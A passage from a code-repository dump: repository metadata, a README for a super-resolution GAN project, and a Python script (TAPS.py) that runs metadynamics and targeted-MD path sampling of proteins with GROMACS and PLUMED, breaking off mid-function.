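    # mimics scipy.misc.imresize(arr, [h, w]) with its default bilinear filter
    img = Image.fromarray(np.uint8(arr))
    return np.array(img.resize((size[1], size[0]), Image.BILINEAR))
```

Note that PIL's `resize` takes `(width, height)`, the reverse of the `[h, w]` order used in the repo, hence the swapped indices.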
{
"alpha_fraction": 0.7723857164382935,
"alphanum_fraction": 0.7839699387550354,
"avg_line_length": 117.22222137451172,
"blob_id": "842f3d7562f0a692fbcafd87658f0d9b7acbb452",
"content_id": "98eb9ee30b6bb06288f5e816cdf2f210fe193a0e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3194,
"license_type": "permissive",
"max_line_length": 386,
"num_lines": 27,
"path": "/README.md",
"repo_name": "MingtaoGuo/Residual-Dense-Network-Trained-with-cGAN-for-Super-Resolution",
"src_encoding": "UTF-8",
"text": "# Residual-Dense-Network-Trained-with-cGAN-for-Super-Resolution\nThis repository is as a research project in the field of super resolution. It uses RDN as the generator and spectral norm is used in discriminator.\n\n# Introduction\n### This is a trial for super-resolution\nThe residual dense network has many advantages for reconstructing SR images, and we use GANs to enhance RDN.\nThe core idea is from the following two papers:\n1. Residual Dense Network for Image Super-Resolution\n2. cGANs with projection discriminator\n##### Generator: Residual Dense Network\n\n##### Discriminator: cGAN projection\n\n# Results\nThese results is just trained about 200,000 iterations (full: 600,000) with batch size of 16. \n\n|Raw|Bicubic(x4)|RDN_GAN(x4)|\n|-|-|-|\n||||\n||||\n||||\n||||\n||||\n# Reference \n[1] Zhang Y, Tian Y, Kong Y, et al. Residual dense network for image super-resolution[C]//The IEEE Conference on Computer Vision and Pattern Recognition (CVPR). 2018.\n\n[2] Miyato T, Koyama M. cGANs with projection discriminator[J]. arXiv preprint arXiv:1802.05637, 2018.\n\n\n"
}
] | 5 |
xikun2020/TAPS
|
https://github.com/xikun2020/TAPS
|
068affea464b2a4796df0b2ef031c80e72dc92d7
|
b84f719fed06b13fdc15db4741f3d41e87f6777e
|
ae113327db2dc57edf201ffa630a641cfe64de7b
|
refs/heads/master
| 2023-07-26T09:01:49.362262 | 2023-07-06T02:43:34 | 2023-07-06T02:43:34 | 372,518,986 | 5 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5445557832717896,
"alphanum_fraction": 0.5519817471504211,
"avg_line_length": 46.896217346191406,
"blob_id": "e045f54b21169b226d174fa450ff521c85c15386",
"content_id": "e9a3f7d99d1bab2ee08e72fb5e714263f19e7f37",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 44304,
"license_type": "no_license",
"max_line_length": 145,
"num_lines": 925,
"path": "/TAPS.py",
"repo_name": "xikun2020/TAPS",
"src_encoding": "UTF-8",
"text": "# =======================================================================================================================\n# global import: future_print, numpy, mdtraj, os, re, argparse\n# =======================================================================================================================\nfrom __future__ import print_function, division\nimport numpy as np\nimport mdtraj as md\nimport os\nimport glob\nimport re\nimport shutil\nimport time\nimport errno\n# =======================================================================================================================\n# import python wrappers for MD engines (GROMACS, NAMD, AMBER)\n# =======================================================================================================================\nimport gromacs.setup\nimport gromacs.run\nimport gromacs.tools\nimport gromacs\n\n# For treating gromacs warnings at mdrun as exception in python\n# such that mdrun can be terminated if\nimport warnings\n\nwarnings.simplefilter('error', gromacs.AutoCorrectionWarning)\nwarnings.simplefilter('error', gromacs.BadParameterWarning)\nwarnings.simplefilter('error', gromacs.GromacsValueWarning)\nwarnings.simplefilter('error', gromacs.GromacsFailureWarning)\n\nfrom Confs import Confs\nfrom PcvInd import PcvInd\nfrom Path import Path\n\n## =======================================================================================================================\n## import mpi4py for parallel computing\n## =======================================================================================================================\n#mpi4py package#\n\n# ======================================================================================================================\n# digits formater for iterations: \"3 --> 03\"\n# ======================================================================================================================\ndef digits(s1):\n\ts2 = \"%.3d\" % s1\n\treturn s2\n\n# ==================================================================================================================\n# wrapper for a single run of metaD\n# engine-specific implementation of sampling is realized in this function\n# ==================================================================================================================\ndef runMeta(dire, engine, runName, pluName, cvOut, trjName):\n\tif engine == 'GROMACS':\n\t\tmeta = gromacs.run.MDrunner(dire, ntmpi='1', ntomp=threads, nb='gpu', bonded='gpu', pme='gpu', deffnm=runName, gpu_id=rank, plumed=pluName) \n\t\tmeta.run() \n\t\t# make sure xtc is complete, under restrains, high energy confs may be generated\n\t\t# use trjconv to disregard \"unphysical (CV values is nan)\" frames\n\t\t# meanwhile, there are two other cases to consider\n\t\t# 1. when there is no output or only one line in CV file (sampling crashed in the first step)\n\t\t# this can be dealt with by put the endtime at 0\n\t\t# 2. 
when the last line is incomplete\n\t\t# just remove the last line\n\t\tkeepLineIndex = []\n\t\tinFile = open(dire + '/' + cvOut, 'r+')\n\t\tfor i, line in enumerate(inFile):\n\t\t\tif line[0] != \"#\":\n\t\t\t\tif not re.match('.*nan.*', line):\n\t\t\t\t\tkeepLineIndex.append(i)\n\t\tlineCount = len(keepLineIndex)\n\t\toutput = open(dire + '/colvar_filter', 'w+')\n\t\tif lineCount == 1: # only one line: keep this line\n\t\t\tendTime = 0\n\t\t\tlines = inFile.readlines()\n\t\t\tline = lines[keepLineIndex[0]]\n\t\t\toutput.write(line)\n\t\telse: # many lines in CV file, only remove the last line (incomplete when sampling crashes)\n\t\t\tinFile = open(dire + '/' + cvOut, 'r+')\n\t\t\tlines = inFile.readlines()\n\t\t\toutput = open(dire + '/colvar_filter', 'w+')\n\t\t\tfor k in range(lineCount - 1): # remove the last line (incomplete when sampling crashes)\n\t\t\t\tline = lines[keepLineIndex[k]]\n\t\t\t\tendTime = line.split()[0]\n\t\t\t\toutput.write(line)\n\t\tinFile.close()\n\t\toutput.close()\n\t\tshutil.move(dire + '/' + trjName, dire + '/bak_' + trjName)\n\t\ttrjconv = gromacs.tools.Trjconv(s=dire + '/' + runName + '.tpr', f=dire + '/bak_' + trjName,\n\t\t\to=dire + '/who_' + trjName, e=endTime, pbc='whole', input=('System'))\n\t\ttrjconv.run()\n\t\ttrjconv = gromacs.tools.Trjconv(s=dire + '/' + runName + '.tpr', f=dire + '/who_' + trjName,\n\t\t\to=dire + '/' + trjName, e=endTime, \\\n\t\t\tur='compact', center=True, pbc='mol', input=('Protein', 'System'), n=dire + '/index.ndx')\n\t\ttrjconv.run()\n\t\tos.remove(dire + '/bak_' + trjName)\n\t\tos.remove(dire + '/who_' + trjName)\n\telse:\n\t\traise ValueError(\"MD engines other than GROMACS are not support yet\")\n\n\n# ==================================================================================================================\n# wrapper for a single run of metaD\n# engine-specific implementation of sampling is realized in this function\n# ==================================================================================================================\ndef runTMD(dire, engine, runName, pluName, trjName):\n\tif engine == 'GROMACS':\n\t\ttmd = gromacs.run.MDrunner(dire, ntmpi='1', ntomp=threads, nb='gpu', bonded='gpu', pme='gpu', deffnm=runName, gpu_id=rank, plumed=pluName)\n\t\ttmd.run()\n\n\t\tshutil.move(dire + '/' + trjName, dire + '/bak_' + trjName)\n\t\ttrjconv = gromacs.tools.Trjconv(s=dire + '/' + runName + '.tpr', f=dire + '/bak_' + trjName,\n\t\t\to=dire + '/who_' + trjName, pbc='whole', input=('System'))\n\t\ttrjconv.run()\n\t\ttrjconv = gromacs.tools.Trjconv(s=dire + '/' + runName + '.tpr', f=dire + '/who_' + trjName, \\\n\t\t\to=dire + '/' + trjName, ur='compact', center=True, pbc='mol', \\\n\t\t\tinput=('Protein', 'System'), n=dire + '/index.ndx')\n\t\ttrjconv.run()\n\t\tos.remove(dire + '/bak_' + trjName)\n\t\tos.remove(dire + '/who_' + trjName)\n\telse:\n\t\traise ValueError(\"MD engines other than GROMACS are not support yet\")\n\n\n# ======================================================================================================================\n# class TAPS: encoding methods for each iteration of TAPS\n# ======================================================================================================================\nclass TAPS(object):\n\t# default structure file, these names are important during sampling and plumed computation\n\tnodeName = 'node.pdb'\n\trunName = 'run'\n\ttrjName = 'run.xtc'\n\ttrjFilter = 'filtered.xtc'\n\tpluName = 'plumed.dat'\n\tcvOut = 'COLVAR'\n\n\t# 
==================================================================================================================\n\t# constructor: read in taps parameters and relevant files (system topology, initial path, PCV definition)\n\t# ==================================================================================================================\n\tdef __init__(self, dire='pars', parFile='taps.par', topFile='protein.pdb', p0='path0.xtc', alignFile='align.ndx', \\\n\t\trmsFile='rms.ndx', ndxFile='index.ndx'):\n\n\t\t# check if inputs exists\n\t\tif not os.path.isdir(dire):\n\t\t\traise ValueError(\"Directory %s for initial path & parameters does not exist\" % dire)\n\t\tif not os.path.exists(dire + '/' + parFile):\n\t\t\traise ValueError(\"Parameters file %s is not found in directory %s\" % (parFile, dire))\n\t\tif not os.path.exists(dire + '/' + topFile):\n\t\t\traise ValueError(\"Structure file %s is not found in directory %s\" % (topFile, dire))\n\t\tif not os.path.exists(dire + '/' + p0):\n\t\t\traise ValueError(\"Trajectory of initial path (%s) is not found in directory '%s'\" % (p0, dire))\n\t\tif not os.path.exists(dire + '/' + alignFile):\n\t\t\traise ValueError(\"Atom index file for alignment (%s) is not found in directory %s\" % (alignFile, dire))\n\t\tif not os.path.exists(dire + '/' + rmsFile):\n\t\t\traise ValueError(\"Atom index file for rms computation (%s) is not found in directory %s\" % (rmsFile, dire))\n\n\t\t# record root directory\n\t\tself.dirRoot = os.getcwd()\n\n\t\t# record directory for initial path and parameters\n\t\tself.dirPar = self.dirRoot + '/' + dire\n\n\t\t# record topology file name and position\n\t\tself.topNAME = topFile\n\t\tself.topFile = self.dirPar + '/' + topFile\n\n\t\t# record alignment index file position\n\t\tself.alignFile = self.dirPar + '/' + alignFile\n\n\t\t# record rms index file position\n\t\tself.rmsFile = self.dirPar + '/' + rmsFile\n\n\t\t# record rms index file position\n\t\tself.ndxFile = self.dirPar + '/' + ndxFile\n\n\n\t\t# load atom indices for PCV definition (alignment & rmsd calculation)\n\t\talign = np.loadtxt(self.dirPar + '/' + alignFile, dtype=np.int32)\n\t\trms = np.loadtxt(self.dirPar + '/' + rmsFile, dtype=np.int32)\n\t\tself.pcvInd = PcvInd(align, rms)\n\n\t\t# load initial refPath (compute initial s, included)\n\t\tself.refPath = Path('iter' + digits(0), self.pcvInd)\n\t\tself.refPath.loadFromTRJ(self.dirPar + '/' + p0, self.dirPar + '/' + topFile)\n\n\t\t# initialize initial node (extracting from initial path)\n\t\tself.initNode = self.refPath.nodes.slice(0)\t\t\t#Initial Conf##\n\n\t\t# initialize final node (extracting from initial path)\n\t\tself.finalNode = self.refPath.nodes.slice(self.refPath.n_nodes - 1)\t\t#Final Conf##\n\n\t\t# read in parameters for MD and metaD\n\t\tfr = open(self.dirPar + '/' + parFile, 'r+')\n\t\tpars = fr.read()\n\t\tfr.close()\n\n\t\t# MD parameters\n\t\t# engine specific input check\n\t\tmatch = re.search(\"engine=.*\\n\", pars)\n\t\tif match is not None:\n\t\t\tself.engine = re.split('=', match.group(0).rstrip('\\n'))[1]\n\t\telse:\n\t\t\traise ValueError(\"MD engine not given in parameter file %s\" % (parFile))\n\t\tif self.engine == 'GROMACS':\n\t\t\tmatch = re.search(\"groTOP=.*\\n\", pars)\n\t\t\tif match is not None:\n\t\t\t\tself.groTOP = re.split('=', match.group(0).rstrip('\\n'))[1]\n\t\t\t\tif not os.path.exists(self.dirPar + '/' + self.groTOP):\n\t\t\t\t\traise ValueError(\"GROMACS topology file %s is not found in directory %s\" % (self.groTOP, 
\\\n\t\t\t\t\t\tself.dirPar))\n\t\t\telse:\n\t\t\t\traise ValueError(\"GROMACS topology file not given in %s\" % (parFile))\n\t\t\tmatch = re.search(\"groMDP=.*\\n\", pars)\n\t\t\tif match is not None:\n\t\t\t\tself.groMDP = re.split('=', match.group(0).rstrip('\\n'))[1]\n\t\t\t\tif not os.path.exists(self.dirPar + '/' + self.groMDP):\n\t\t\t\t\traise ValueError(\"GROMACS template mdp file %s is not found in directory %s\" % (self.groMDP, \\\n\t\t\t\t\t\tself.dirPar))\n\t\t\telse:\n\t\t\t\traise ValueError(\"gromacs mdp file %s not given in %s\" % (parFile))\n\t\telif self.engine == 'NAMD':\n\t\t\traise ValueError('NAMD is not supported yet')\n\t\telif self.engine == 'AMBER':\n\t\t\traise ValueError('AMBER is not supported yet')\n\t\telse:\n\t\t\traise ValueError(\"unknown MD engine %s\" % self.engine)\n\n\t\t# mode = {serial, parallel, qjob}\n\t\tmatch = re.search(\"runMode=.*\\n\", pars)\n\t\tif match is not None:\n\t\t\tself.mode = re.split('=', match.group(0).rstrip('\\n'))[1]\n\t\telse:\n\t\t\traise ValueError(\"Mode of running (runMode) not given in parameter file %f\" % (parFile))\n\n\t\t# time step\n\t\tmatch = re.search(\"timeStep=.*\\n\", pars)\n\t\tif match is not None:\n\t\t\tself.timeStep = float(re.split('=', match.group(0).rstrip('\\n'))[1])\n\t\telse:\n\t\t\traise ValueError(\"MD timestep (timestep, unit: ps) not given in parameter file %f\" % (parFile))\n\n\t\tmatch = re.search(\"lenSample=.*\\n\", pars)\n\t\tif match is not None:\n\t\t\tself.lenSample = float(re.split('=', match.group(0).rstrip('\\n'))[1])\n\t\telse:\n\t\t\traise ValueError(\"Amount of sampling per taps iteration ('lenSample', unit: ps) not given in \\\n\t\t\t\tparameter file %f\" % (parFile))\n\t\tself.lenMetaD = self.lenSample / self.refPath.n_nodes\n\n\t\t# gaussian height for MetaD\n\t\tmatch = re.search(\"gauHeight=.*\\n\", pars)\n\t\tif match is not None:\n\t\t\tself.gauHeight = float(re.split('=', match.group(0).rstrip('\\n'))[1])\n\t\telse:\n\t\t\traise ValueError(\"Height of gaussian for MetaDynamics (gh) not give in parameter file %s\" % (parFile))\n\n\t\t# gaussian width for MetaD\n\t\tmatch = re.search(\"gauWidth=.*\\n\", pars)\n\t\tif match is not None:\n\t\t\tself.sigma = float(re.split('=', match.group(0).rstrip('\\n'))[1])\n\t\telse:\n\t\t\traise ValueError(\"Width of gaussian for MetaDynamics (sigma) not given in parameter file %s\" % (parFile))\n\n\t\t# deposition interval for MetaD\n\t\tmatch = re.search(\"tauMetaD=.*\\n\", pars)\n\t\tif match is not None:\n\t\t\tself.tauMetaD = float(re.split('=', match.group(0).rstrip('\\n'))[1])\n\t\telse:\n\t\t\traise ValueError(\"Period for adding gaussians (tauMetaD) not given in parameter file %s\" % (parFile))\n\n\t\t# biasFactor for well-tempered MetaD\n\t\tmatch = re.search(\"biasFactor=.*\\n\", pars)\n\t\tif match is not None:\n\t\t\tself.bf = int(re.split('=', match.group(0).rstrip('\\n'))[1])\n\t\telse:\n\t\t\traise ValueError(\"BiasFactor for wt-MetaDynamics (biasFactor, 2-10) not given in parameter file %s\" % (parFile))\n\n\t\t# system temperature for well-tempered MetaD\n\t\tmatch = re.search(\"temp=.*\\n\", pars)\n\t\tif match is not None:\n\t\t\tself.temp = int(re.split('=', match.group(0).rstrip('\\n'))[1])\n\t\telse:\n\t\t\traise ValueError(\"Temperature for wt-MetaDynamics (temp) not given in parameter file %s\" % (parFile))\n\n\t\t# output frequency of trajectories\n\t\tmatch = re.search(\"freqTRJ=.*\\n\", pars)\n\t\tif match is not None:\n\t\t\tself.freqTRJ = int(re.split('=', 
match.group(0).rstrip('\\n'))[1])\n\t\telse:\n\t\t\traise ValueError(\"Output frequency of sampling trajectories (freqTRJ) not given in parameter file %f\" % (parFile))\n\n\t\tfr = open(self.dirPar + '/' + self.groMDP, 'r+')\n\t\tlinesMDP = fr.readlines()\n\t\tfr.close()\n\t\tmdpFile = 'md.mdp'\n\t\tfw = open(self.dirPar + '/' + mdpFile, 'w+')\n\t\tfw.writelines(linesMDP)\n\t\tprint('nstxout-compressed= %d' % self.freqTRJ, file=fw)\n\t\tfw.close()\n\t\tself.groMDP = mdpFile\n\n\t\t# output frequency of trajectories\n\t\tmatch = re.search(\"kappa=.*\\n\", pars)\n\t\tif match is not None:\n\t\t\tself.kappa = int(re.split('=', match.group(0).rstrip('\\n'))[1])\n\t\telse:\n\t\t\traise ValueError(\"Wall strength on PCV-s (kappa, 10-50) not given in parameter file %f\" % (parFile))\n\n\t\t# tolerable restraining potential to ensure \"physically irrelevant\" conformations are selected\n\t\t# selecting frames with small restrain potential is a more direct approach than ds-s[0]<sTol\n\t\t# because it makes the choice independent from the kappa of the restraining potential\n\t\tmatch = re.search(\"tolRS=.*\\n\", pars)\n\t\tif match is not None:\n\t\t\tself.rsTol = float(re.split('=', match.group(0).rstrip('\\n'))[1])\n\t\telse:\n\t\t\traise ValueError(\"Tolerable restraining potential (rsTol) not found in parameter file %s \\n This parameter\\\n\t\t\t\tis crucial for selecting frames from MetaD trajectories\" % (parFile))\n\n\t\t\t# parameters for path-reparameterization\n\t\t\t# tolerable distance between neighbor nodes, used for reparameterization\n\t\tmatch = re.search(\"tolDist=.*\\n\", pars)\n\t\tif match is not None:\n\t\t\tself.tolDist = float(re.split('=', match.group(0).rstrip('\\n'))[1])\n\t\telse:\n\t\t\traise ValueError(\"Tolerable maximum distance (tolDist) between neighbor nodes not given in parameter\\\n\t\t\t\tfile %s\\n This parameter is crucial for path reparameterzation\" % (parFile))\n\n\t\t# tolerable asymmetry factor, determines how much deviation from the used for path reparameterization\n\t\tmatch = re.search(\"devMID=.*\\n\", pars)\n\t\tif match is not None:\n\t\t\tself.devMID = float(re.split('=', match.group(0).rstrip('\\n'))[1])\n\t\t\tif self.devMID > 1 or self.devMID <= 0:\n\t\t\t\traise ValueError(\"Parameter devMID out of range ( 0<devMID<=1 required )\")\n\t\telse:\n\t\t\traise ValueError(\n\t\t\t\t\"Tolerable deviation from vertical line between two distant nodes (devMID) is not given in parameter \\\n\t\t\t\tfile %s\\n This parameter is crucial for path reparameterzation\" % (parFile))\n\n\t\t# tolerable cosTheta, used for reparameterization\n\t\tmatch = re.search(\"tolCos=.*\\n\", pars)\n\t\tif match is not None:\n\t\t\tself.tolCos = float(re.split('=', match.group(0).rstrip('\\n'))[1])\n\t\t\tif self.tolCos > 0.5:\n\t\t\t\tself.tolCos = 0.5\n\t\t\t\tprint(\"Tolerable cos(theta) in parameter file %s must be <=0.5\\n setting to 0.5\" % (parFile))\n\t\telse:\n\t\t\traise ValueError(\n\t\t\t\t\"Tolerable cos(theta) to select \\\"middle\\\" conformations between neighbor nodes is not given in \\\n\t\t\t\t\tparameter file %s\" % (parFile))\n\n\t\t# straightening factor\n\t\tsub_i = self.initNode.atom_slice(self.pcvInd.atomSlice)\n\t\tsub_f = self.finalNode.atom_slice(self.pcvInd.atomSlice)\n\t\tsub_f.superpose(sub_i, 0, self.pcvInd.align)\n\t\tdist_term = md.rmsd(sub_f, sub_i, 0, self.pcvInd.rms)\n\t\tmatch = re.search(\"stf=.*\\n\", pars)\n\t\tif match is not None:\n\t\t\tself.stf = float(re.split('=', match.group(0).rstrip('\\n'))[1])\n\t\t\tif ((self.stf < 1) or 
(self.stf > (dist_term/self.tolDist/2.5))):\n\t\t\t\tprint(\"Straightening factor (stf) is out of range (must be 1 <= stf <= d[0,end]/tolDist )\")\n\t\t\t\tself.stf = dist_term / self.tolDist / 3\n\t\t\t\tprint(\"Setting stf as d[0,end]/tolDist/3: stf=\", self.stf)\n\t\telse:\n\t\t\tprint(\"Straightening Factor for path reparameterization (stf) not given in \\\n\t\t\t\tparameter file %s\" % (parFile))\n\t\t\tself.stf = dist_term / self.tolDist / 3\n\t\t\tprint(\"Setting stf as d[0,end]/tolDist/3: stf=\", self.stf)\n\n\t\t# wall position of PCV-Z for MetaD\n\t\tmatch = re.search(\"zw=.*\\n\", pars)\n\t\tif match is not None:\n\t\t\tself.zw = float(re.split('=', match.group(0).rstrip('\\n'))[1])\n\t\t\tself.zw = (self.zw * self.tolDist) ** 2\n\t\telse:\n\t\t\traise ValueError(\"Wall position of PCV-Z for MetaDynamics (zw, unit: nm^2) not given in parameter file %s\" % (parFile))\n\n\t\t# wall strength of PCV-Z for MetaD\n\t\tmatch = re.search(\"zwK=.*\\n\", pars)\n\t\tif match is not None:\n\t\t\tself.zwK = float(re.split('=', match.group(0).rstrip('\\n'))[1])\n\t\telse:\n\t\t\tself.zwK = self.rsTol / (self.tolDist / 20) ** 2\n\t\t\t# raise ValueError(\"Kappa for wall on PCV-Z is not given for MetaD in parameter file %s\" % (parFile))\n\n\t\t# kappa for targeted MD\n\t\tmatch = re.search(\"kTMD=.*\\n\", pars)\n\t\tif match is not None:\n\t\t\tself.kTMD = int(re.split('=', match.group(0).rstrip('\\n'))[1])\n\t\telse:\n\t\t\tprint(\"Kappa of targeted MD (kTMD) for path reparameterization is not given in \\\n\t\t\t\tparameter file %s\" % (parFile))\n\n\t\t# length of targeted MD \n\t\t# default length of targeted MD\n\t\tself.lenTMD = 10\n\t\tmatch = re.search(\"lenTMD=.*\\n\", pars)\n\t\tif match is not None:\n\t\t\tself.lenTMD = float(re.split('=', match.group(0).rstrip('\\n'))[1])\n\t\telse:\n\t\t\tprint(\"Length of targeted MD (lenTMD) for path reparameterization is not given in \\\n\t\t\t\tparameter file %s\" % (parFile))\n\n\t# ==================================================================================================================\n\t# Prepare directories & files for MetaD\n\t# 1. make directories\n\t# 2. store node.pdb for sampling under each directory\n\t# 3. specify the MetaD length by self.lenSample / path.n_nodes\n\t# ==================================================================================================================\n\tdef meta_dirs(self, p, dirMeta):\n\t\t# input dirMeta is the directory under which, the MetaD sampling and analysis will be performed\n\t\t# make sure the path is not empty for MetaD sampling\n\t\tif p is None:\n\t\t\traise ValueError(\"Path '%s' is empty, can not be sampled\" % p.pathName)\n\t\t# list to record directories for running\n\t\tdirRUNs = []\n\t\tfor n in range(p.n_nodes):\n\t\t\tdirNode = 'node' + digits(n)\n\t\t\tlongDirNode = self.dirRoot + '/' + dirMeta + '/' + dirNode\n\t\t\tif not os.path.exists(longDirNode):\n\t\t\t\ttry:\n\t\t\t\t\tos.makedirs(longDirNode)\n\t\t\t\texcept OSError as error:\n\t\t\t\t\tif error.errno != errno.EEXIST:\n\t\t\t\t\t\traise\n\t\t\tnd = p.nodes.slice(n)\n\t\t\tdirRUNs.append(dirNode)\n\t\t\tnodeFile = longDirNode + '/' + self.nodeName\n\t\t\tnd.save(nodeFile)\n\t\t\tcmd = 'cp ' + self.ndxFile + ' ' + self.dirPar + '/posre*.itp' + ' ' + longDirNode\n\t\t\tos.system(cmd)\n\t\treturn dirRUNs\n\n\n\t# ==================================================================================================================\n\t# Prepare plumed files for metaD sampling\n\t# 1. plumed input file\n\t# 2. 
path pdb file for PCV definition in plumed2 format\n\t# NOTE: engine-specific running files is implemented in prepSampling()\n\t# ==================================================================================================================\n\tdef meta_setup(self, p, dirMeta, dirRUNs):\n\t\tif not os.path.exists(dirMeta):\n\t\t\tos.makedirs(dirMeta)\n\t\tfor i in range(len(dirRUNs)):\t# Make sure all the tasks assigned evenly to the nodes #\n\t\t\trunDir = self.dirRoot + '/' + dirMeta + '/' + dirRUNs[i]\n\t\t\t#print(\"+++DEBUG+++ prepSampling for node\", i)\n\t\t\tself.prepSampling(runDir + '/' + self.nodeName, runDir, self.lenSample / p.n_nodes)\n\t\t\t#Next prepare plumed path files\n\t\t\t#print(\"+++DEBUG+++ p.exportPCV\")\n\t\t\tp.exportPCV(runDir)\n\t\t\tp.pcv(runDir) # compute lamda for this path\n\t\t\t# compute self PCV for restraining position on PCV-s\n\t\t\t# Here we must use the node.pdb generated by meta_dirs(), it is the exact starting conformation\n\t\t\t# if we use the xtc file, there might be problems\n\t\t\tnode = md.load(runDir + '/' + self.nodeName, top=self.topFile)\n\t\t\ts0,z0 = p.pcv(runDir, node) \n\t\t\t# write plumed parameters\n\t\t\t# prepare plumed input file for distance calculation\n\t\t\tpluInput = runDir + '/' + self.pluName\n\t\t\tf = open(pluInput, 'w+')\n\t\t\tatoms = ''\n\t\t\tfor j in range(len(self.pcvInd.atomSlice) - 1):\n\t\t\t\tatoms = atoms + str(self.pcvInd.atomSlice[j] + 1) + ','\n\t\t\tatoms = atoms + str(self.pcvInd.atomSlice[len(self.pcvInd.atomSlice) - 1] + 1)\n\t\t\tprint(\"WHOLEMOLECULES STRIDE=1 ENTITY0=%s\" % atoms, file=f)\n\t\t\tprint(\"p1: PATHMSD REFERENCE=%s LAMBDA=%f NEIGH_STRIDE=4 NEIGH_SIZE=8\" \\\n\t\t\t\t% (p.pathName + '_plu.pdb', p.lamda), file=f)\n\t\t\tprint(\"METAD ARG=p1.sss SIGMA=%f HEIGHT=%f PACE=%d TEMP=%f BIASFACTOR=%d LABEL=metaU\" \\\n\t\t\t\t% (self.sigma, self.gauHeight, self.tauMetaD, self.temp, self.bf), file=f)\n\t\t\tprint(\"UPPER_WALLS ARG=p1.zzz AT=%f KAPPA=%f EXP=2 EPS=1 OFFSET=0 LABEL=zwall\" \\\n\t\t\t\t% (self.zw, self.zwK), file=f)\n\t\t\tprint(\"RESTRAINT ARG=p1.sss KAPPA=%f AT=%f LABEL=res\" % (self.kappa, s0), file=f)\n\t\t\tprint(\"PRINT ARG=p1.sss,p1.zzz,metaU.bias,res.bias,zwall.bias STRIDE=\" \\\n\t\t\t\t+ str(self.freqTRJ) + \" FILE=\" + self.cvOut + \" FMT=%8.16f\", file=f)\n\t\t\tf.close()\n\n\tdef prepSampling(self, node, dire, lenMetaD):\n\t\tif self.engine == 'GROMACS': \n\t\t\tgromacs.setup.MD(dire, mdp=self.dirPar + '/' + self.groMDP, mainselection=None, struct=node, \\\n\t\t\t\ttop=self.dirPar + '/' + self.groTOP, deffnm=self.runName, runtime=lenMetaD, \\\n\t\t\t\tdt=self.timeStep, maxwarn=50, ndx=self.ndxFile)\t\n\t\t\t# print('+++DEBUG+++ Sampling preparation finished')\n\t\telse:\n\t\t\traise ValueError(\"MD engines other than GROMACS are not support yet\")\n\n\tdef prepTMD(self, node, dire, lenTMD):\n\t\tif self.engine == 'GROMACS': \n\t\t\tgromacs.setup.MD(dire, mdp=self.dirPar + '/' + self.groMDP, mainselection=None, struct=node, \\\n\t\t\t\ttop=self.dirPar + '/' + self.groTOP, deffnm=self.runName, runtime=lenTMD, \\\n\t\t\t\tdt=self.timeStep, maxwarn=50, ndx=self.ndxFile)\n\t\telse:\n\t\t\traise ValueError(\"MD engines other than GROMACS are not support yet\")\n\n\n\t# ==================================================================================================================\n\t# perform the actual MetaD sampling\n\t# ==================================================================================================================\n\tdef meta_sample(self, dirMeta, 
dirRUNs): #, NumNode, IndProc):\n\t\tN_jobs = len(dirRUNs) # the total number of trajectories to run\n\t\tfor itr in range(0, int(N_jobs / size) + 1):\t# Make sure all the tasks assigned evenly to the nodes #\n\t\t\t#print('+++DEBUG+++ MetaDynamics sampling for rank %d' % rank )\n\t\t\ttid = itr * size + rank\n\t\t\tif tid < N_jobs:\n\t\t\t\trunDir = self.dirRoot + '/' + dirMeta + '/' + dirRUNs[tid]\n\t\t\t\tprint(\"+++TAPS+++ Sampling Node \" + str(tid) + \" (size \" + str(size) + \", rank \" +str(rank) + \")\")\n\t\t\t\trunMeta(dire=runDir, engine=self.engine, runName=self.runName, pluName=self.pluName, cvOut=self.cvOut, trjName=self.trjName)\n\n\t# ==================================================================================================================\n\t# Prepare directories & files for tMD (for reparameterization)\n\t# after inserting nodes, generate an list of nodes to insert\n\t# 1. make directories\n\t# 2. store node.pdb for sampling under each directory\n\t# 3. specify the MetaD length by self.lenSample / path.n_nodes\n\t# ==================================================================================================================\n\tdef tmd_dirs(self, list_pairs, dirMeta):\n\t\t# input dirMeta is the directory under which, the targeted MD sampling will be performed\n\t\tif list_pairs is None:\n\t\t\traise ValueError(\"list_pairs is empty, no tMD will be performed for path-reparameterization\")\n\t\t# list to record directories for running\n\t\tdirRUNs = []\n\t\tfor i in range(len(list_pairs)):\n\t\t\tdirPair = 'pair' + digits(i)\n\t\t\tlongDirPair = self.dirRoot + '/' + dirMeta + '/' + 'tmd4repar' + '/' + dirPair\n\t\t\tif not os.path.exists(longDirPair):\n\t\t\t\tos.makedirs(longDirPair)\n\t\t\t# store 1st node of the pair as starting conformation for targeted MD\n\t\t\tnd = list_pairs[i].slice(0)\n\t\t\tdirRUNs.append('tmd4repar/' + dirPair)\n\t\t\tnodeFile = longDirPair + '/' + self.nodeName\n\t\t\tnd.save(nodeFile)\n\t\t\t# store 2nd node of the pair as target conformation for targeted MD\n\t\t\ttargetFile = longDirPair + '/target.pdb'\n\t\t\tlist_pairs[i].slice(1).save_plu2(targetFile,self.pcvInd)\n\t\t\tcmd = 'cp ' + self.ndxFile + ' ' + self.dirPar + '/posre*.itp' + ' ' + longDirPair\n\t\t\tos.system(cmd)\n\t\treturn dirRUNs\n\n\t# ==================================================================================================================\n\t# Prepare plumed files for targeted MD sampling\n\t# 1. 
plumed input file\n\t# NOTE: engine-specific running files is implemented in prepTMD()\n\t# ==================================================================================================================\n\tdef tmd_setup(self, dirMeta, dirRUNs):\n\t\tif not os.path.exists(dirMeta):\n\t\t\tos.makedirs(dirMeta)\n\t\tN_jobs = len(dirRUNs)\n\t\tfor itr in range(0, int(N_jobs / size) + 1):\t# Make sure all the tasks assigned evenly to the nodes #\n\t\t\t#print('+++DEBUG+++ Setting-up tmd sampling for rank %d' % rank )\n\t\t\ttid = itr * size + rank\n\t\t\tif tid < N_jobs: \n\t\t\t\t# prepare MD files\n\t\t\t\trunDir = self.dirRoot + '/' + dirMeta + '/' + dirRUNs[tid]\n\t\t\t\tself.prepTMD(runDir + '/' + self.nodeName, runDir, self.lenTMD)\n\t\t\t\t# prepare plumed input file for distance calculation\n\t\t\t\tpluInput = runDir + '/' + self.pluName\n\t\t\t\tf = open(pluInput, 'w+')\n\t\t\t\tatoms = ''\n\t\t\t\tfor j in range(len(self.pcvInd.atomSlice) - 1):\n\t\t\t\t\tatoms = atoms + str(self.pcvInd.atomSlice[j] + 1) + ','\n\t\t\t\tatoms = atoms + str(self.pcvInd.atomSlice[len(self.pcvInd.atomSlice) - 